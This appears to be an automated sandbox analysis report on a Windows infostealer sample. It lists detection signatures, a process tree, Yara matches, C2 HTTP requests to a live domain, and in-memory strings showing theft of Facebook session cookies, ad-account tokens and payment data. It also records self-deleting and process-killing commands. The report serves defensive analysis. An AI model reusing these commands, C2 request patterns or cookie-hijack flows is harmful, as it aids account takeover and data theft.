Analysis Report IpB8f8qwze.exe

Overview

General Information

Sample Name: IpB8f8qwze.exe
Analysis ID: 364295
MD5: 1b59fc1a89c1bc88ea4e1b26da579120
SHA1: 6d1eb3583826aa70f437aba38beee8b787c2da7f
SHA256: 6a9b454b620677ea11f4f69156969468b0f43ebdfe27dabfb0cf16572f9379eb
Tags: exe

Detection

Score: 90
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Startup

  • System is w10x64
  • IpB8f8qwze.exe (PID: 6500 cmdline: 'C:\Users\user\Desktop\IpB8f8qwze.exe' MD5: 1B59FC1A89C1BC88EA4E1B26DA579120)
    • msiexec.exe (PID: 6560 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 83C12B0D0FA88B10.exe (PID: 6636 cmdline: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 0011 user01 MD5: 1B59FC1A89C1BC88EA4E1B26DA579120)
      • 1615173766196.exe (PID: 6972 cmdline: 'C:\Users\user\AppData\Roaming\1615173766196.exe' /sjson 'C:\Users\user\AppData\Roaming\1615173766196.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 7156 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 4920 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 204 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 83C12B0D0FA88B10.exe (PID: 6704 cmdline: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 200 user01 MD5: 1B59FC1A89C1BC88EA4E1B26DA579120)
      • cmd.exe (PID: 7012 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 4632 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6136 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 5456 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 6736 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\IpB8f8qwze.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6776 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 6652 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0E9F5C63C593DB0A234ED10779F63A5A C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.310468368.0000000002720000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x26484:$x1: cmd /c ping 127.0.0.1 -n
00000000.00000002.258774447.00000000027B0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x26484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.275254387.0000000002650000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x26484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.83C12B0D0FA88B10.exe.2650000.5.raw.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.IpB8f8qwze.exe.10000000.7.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x26484:$x1: cmd /c ping 127.0.0.1 -n
2.2.83C12B0D0FA88B10.exe.2720000.3.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.IpB8f8qwze.exe.27b0000.5.raw.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x26484:$x1: cmd /c ping 127.0.0.1 -n
4.2.83C12B0D0FA88B10.exe.2650000.5.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x26484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: 9A3A97F6F45F2C2B.com | Virustotal: Detection: 8%
Source: 9a3a97f6f45f2c2b.com | Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe | Metadefender: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe | ReversingLabs: Detection: 37%
Multi AV Scanner detection for submitted file
Source: IpB8f8qwze.exe | Virustotal: Detection: 46%
Source: IpB8f8qwze.exe | Metadefender: Detection: 16%
Source: IpB8f8qwze.exe | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\IpB8f8qwze.exe | Code function: 0_2_00413970 DecryptFileW,0_2_00413970
Source: C:\Users\user\Desktop\IpB8f8qwze.exe | Code function: 0_2_004129F9 CryptHashPublicKeyInfo,GetLastError,0_2_004129F9
Source: C:\Users\user\Desktop\IpB8f8qwze.exe | Code function: 0_2_0043821C CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_0043821C
Source: C:\Users\user\Desktop\IpB8f8qwze.exe | Code function: 0_2_00412B6A CryptCATAdminCalcHashFromFileHandle,GetLastError,GetLastError,CryptCATAdminCalcHashFromFileHandle,GetLastError,GetLastError,GetLastError,WinVerifyTrust,WinVerifyTrust,WinVerifyTrust,0_2_00412B6A
Source: C:\Users\user\Desktop\IpB8f8qwze.exe | Code function: 0_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,0_2_1001F780
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe | Code function: 2_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,2_2_1001F780

Compliance:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe | Unpacked PE file: 2.2.83C12B0D0FA88B10.exe.2720000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe | Unpacked PE file: 4.2.83C12B0D0FA88B10.exe.2650000.5.unpack
Uses 32bit PE files
Source: IpB8f8qwze.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe | File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: IpB8f8qwze.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: C:\src\wix38\build\ship\x86\burn.pdb source: IpB8f8qwze.exe
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1615173766196.exe, 00000009.00000000.261008599.000000000040F000.00000002.00020000.sdmp, 1615173766196.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000017.00000002.295382420.000000000114C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: gdiview.msi.0.dr
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: a:
Source: C:\Users\user\Desktop\IpB8f8qwze.exe | Code function: 0_2_00436AF7 FindFirstFileW,FindClose,0_2_00436AF7
Source: C:\Users\user\Desktop\IpB8f8qwze.exe | Code function: 0_2_0043740C GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,GetLastError,GetLastError,GetLastError,FindClose,0_2_0043740C
Source: C:\Users\user\Desktop\IpB8f8qwze.exe | Code function: 0_2_00413414 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00413414
Source: C:\Users\user\Desktop\IpB8f8qwze.exe | Code function: 0_2_1001A1D0 FindFirstFileA,FindClose,0_2_1001A1D0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe | Code function: 2_2_1001A1D0 FindFirstFileA,FindClose,2_2_1001A1D0
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\

Networking:

Uses ping.exe to check the status of other devices and networks
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global traffic | HTTP traffic detected:
    GET /info_old/ddd HTTP/1.1
    Host: 9A3A97F6F45F2C2B.com
    Accept: */*
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected:
    POST //fine/send HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 79
    Host: 9a3a97f6f45f2c2b.com
Source: global traffic | HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 9a3a97f6f45f2c2b.com
Source: global traffic | HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 9a3a97f6f45f2c2b.com
Source: global traffic | HTTP traffic detected:
    POST /info_old/e HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 677
    Host: 9a3a97f6f45f2c2b.com
Source: global traffic | HTTP traffic detected:
    POST /info_old/g HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 1393
    Host: 9a3a97f6f45f2c2b.com
Source: global traffic | HTTP traffic detected:
    GET /info_old/r HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Host: 9a3a97f6f45f2c2b.com
Source: C:\Users\user\Desktop\IpB8f8qwze.exe | Code function: 0_2_00425ADA InternetReadFile,WriteFile,WriteFile,GetLastError,GetLastError,0_2_00425ADA
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp | String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp | String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe | String found in binary or memory: _time":"13245950599128816","lastpingday":"13245947458518717","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp | String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp | String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe | String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.263407616.0000000003EF2000.00000004.00000001.sdmp | String found in binary or memory: http://www.youtube.com&#J$ equals www.youtube.com (Youtube)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
